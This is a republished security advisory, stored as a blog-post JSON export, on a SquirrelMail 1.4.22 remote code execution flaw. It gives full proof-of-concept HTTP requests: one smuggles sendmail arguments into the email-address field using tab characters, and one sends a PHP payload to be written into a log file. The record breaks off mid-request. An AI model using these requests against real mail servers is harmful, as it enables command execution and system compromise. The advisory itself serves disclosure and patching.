{"id":7446,"date":"2017-04-25T14:20:24","date_gmt":"2017-04-25T22:20:24","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/25\/news-1237\/"},"modified":"2017-04-25T14:20:24","modified_gmt":"2017-04-25T22:20:24","slug":"news-1237","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/04\/25\/news-1237\/","title":{"rendered":"SSD Advisory \u2013 SquirrelMail Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 25 Apr 2017 05:24:06 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3178\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3178');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes Remote Code Execution found in SquirrelMail version 1.4.22.<\/p>\n<p>SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would  want from an email client, including strong MIME support, address books, and folder manipulation.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Dawid Golunski (https:\/\/legalhackers.com\/), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> SquirrelMail has released patches to address this vulnerability, for more details see: <a href=\"https:\/\/squirrelmail.org\/security\/issue\/2017-04-24\" target=\"_blank\">https:\/\/squirrelmail.org\/security\/issue\/2017-04-24<\/a><\/p>\n<p><span id=\"more-3178\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> SquirrelMail is affected by a Remote Code Execution vulnerability which stems from insufficient escaping of user-supplied data when SquirrelMail has been configured with Sendmail as the main transport. An authenticated attacker may be able to exploit the vulnerability to execute arbitrary commands on the target and compromise the remote system.<\/p>\n<p>When SquirrelMail has been configured with Sendmail as delivery transport,<\/p>\n<p>SquirrelMail uses the following function to send out user emails:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bdf730323661\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;&#8211;[ .\/class\/deliver\/Deliver_SendMail.class.php ]&#8212;&#8211;        function initStream($message, $sendmail_path, $ignore=0, $ignore=&#8221;, $ignore=&#8221;, $ignore=&#8221;, $ignore=&#8221;, $ignore=false, $ignore=&#8221;) {          $rfc822_header = $message-&gt;rfc822_header;          $from = $rfc822_header-&gt;from[0];          $envelopefrom = trim($from-&gt;mailbox.&#8217;@&#8217;.$from-&gt;host);          $envelopefrom = str_replace(array(&#8220;\u0000&#8221;,&#8221;n&#8221;),array(&#8221;,&#8221;),$envelopefrom);          \/\/ save executed command for future reference          $this-&gt;sendmail_command = &#8220;$sendmail_path $this-&gt;sendmail_args -f$envelopefrom&#8221;;          \/\/ open process handle for writing          $stream = popen(escapeshellcmd($this-&gt;sendmail_command), &#8220;w&#8221;);          return $stream;      }    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0072 seconds] -->  <\/p>\n<p>It passes a sender&#8217;s email address to the <em>sendmail<\/em> command interface in the <em>$envelopefrom<\/em> variable.<\/p>\n<p>SquirrelMail allows logged-in users to change the envelope from&#8217;s email address by going to:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bef526549895\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Options-&gt; Personal Information-&gt; E-mail Address<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bef526549895-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bef526549895-1\"><span class=\"crayon-v\">Options<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Personal <\/span><span class=\"crayon-v\">Information<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">E<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">mail <\/span><span class=\"crayon-v\">Address<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>The option however filters out spaces to prevent injection of additional parameters to the <em>sendmail<\/em> program.<\/p>\n<p>It is possible to bypass this filter by using TABS instead of SPACES as shown in this request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bf6190049430\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/squirrelmail\/src\/options.php HTTP\/1.1  Host: trusty  Cookie: squirrelmail_language=deleted; SQMSESSID=udp0a3dbm2oba2710a6amh0kg0; key=aT2bDg%3D%3D; mailviewsplitterv=226; prefviewsplitter=266; folderviewsplitter=266; identviewsplitter=266; language=en; composesplitterv=248; addressviewsplitterd=226; addressviewsplitter=286; roundcube_sessid=151ubr2mfl36odovf7vkk66v60; minimalmode=0  Content-Length: 310    smtoken=qseiZ0jvPW8f&amp;optpage=personal&amp;optmode=submit&amp;new_full_name=Squirrel+PoC&amp;new_email_address=root%09-X%2Ftmp%2Fsqhack%09-oQ%2Ftmp%09null&amp;new_reply_to=replymyaddress%40localhost&amp;new_signature=&amp;new_timezone=none&amp;new_reply_citation_style=none&amp;new_reply_citation_start=&amp;new_reply_citation_end=&amp;submit_personal=Submit<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bf6190049430-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740bf6190049430-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bf6190049430-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740bf6190049430-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bf6190049430-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740bf6190049430-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bf6190049430-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">squirrelmail<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740bf6190049430-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trusty<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bf6190049430-3\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">squirrelmail_language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">deleted<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SQMSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">udp0a3dbm2oba2710a6amh0kg0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">aT2bDg<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mailviewsplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prefviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">folderviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">identviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">composesplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">248<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitterd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">286<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roundcube_sessid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">151ubr2mfl36odovf7vkk66v60<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">minimalmode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740bf6190049430-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">310<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bf6190049430-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740bf6190049430-6\"><span class=\"crayon-v\">smtoken<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">qseiZ0jvPW8f<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">optpage<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">personal<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">optmode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">submit<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_full_name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Squirrel<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">PoC<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_email_address<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Ftmp<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Fsqhack<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">oQ<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2Ftmp<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">09null<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_reply_to<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">replymyaddress<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">40localhost<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_signature<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">new_timezone<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">none<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_reply_citation_style<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">none<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">new_reply_citation_start<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">new_reply_citation_end<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">submit_personal<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Submit<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p>As we can see in <em>new_email_addres<\/em> parameter, the spaces have been replaced with <em>%09<\/em> which is tab ascii character. <\/p>\n<p>Such request will cause SquirrelMail to invoke <em>popen()<\/em> process to <em>sendmail<\/em> interface with the following arguments when a new email is sent out:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740bfd238639970\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/usr\/sbin\/sendmail -i -t -froot -X\/tmp\/sqhack -oQ\/tmp null@trusty<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740bfd238639970-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740bfd238639970-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sbin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sendmail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">froot<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sqhack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">oQ<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">tmp <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">trusty<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>-X parameter allows to set a log file, and -oQ allows to set a tmp directory.<\/p>\n<p>If the installed <em>MTA<\/em> is <em>Sendmail<\/em> on the target system, and an attackers sends a new email, with a malicious content containing a php script in the body of the email to an arbitrary email address, the log of the email containing the payload will be saved in the location desired by the attacker. In the example above, the output file would be <em>\/tmp\/sqhack<\/em>.<\/p>\n<p>Example compose message request which a simple php payload:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740c03739908820\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/squirrelmail\/src\/compose.php HTTP\/1.1  Host: trusty  Cookie: squirrelmail_language=deleted; SQMSESSID=udp0a3dbm2oba2710a6amh0kg0; key=aT2bDg%3D%3D; mailviewsplitterv=226; prefviewsplitter=266; folderviewsplitter=266; identviewsplitter=266; language=en; composesplitterv=248; addressviewsplitterd=226; addressviewsplitter=286; roundcube_sessid=151ubr2mfl36odovf7vkk66v60; minimalmode=0  Connection: keep-alive  Content-Type: multipart\/form-data; boundary=&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;1786870111972091653456139894  Content-Length: 2275    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;smtoken&#8221;    qseiZ0jvPW8f  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;startMessage&#8221;    0  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;session&#8221;    4  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;passed_id&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send_to&#8221;    victim@localhost  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send_to_cc&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send_to_bcc&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;subject&#8221;    Squirrel PoC  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;mailprio&#8221;    3  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;body&#8221;    Squirrel Hack    &lt;?php phpinfo(); ?&gt;  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;send&#8221;    Send  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;MAX_FILE_SIZE&#8221;    2097152  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;attachfile&#8221;; filename=&#8221;&#8221;  Content-Type: application\/octet-stream      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;username&#8221;    hacker    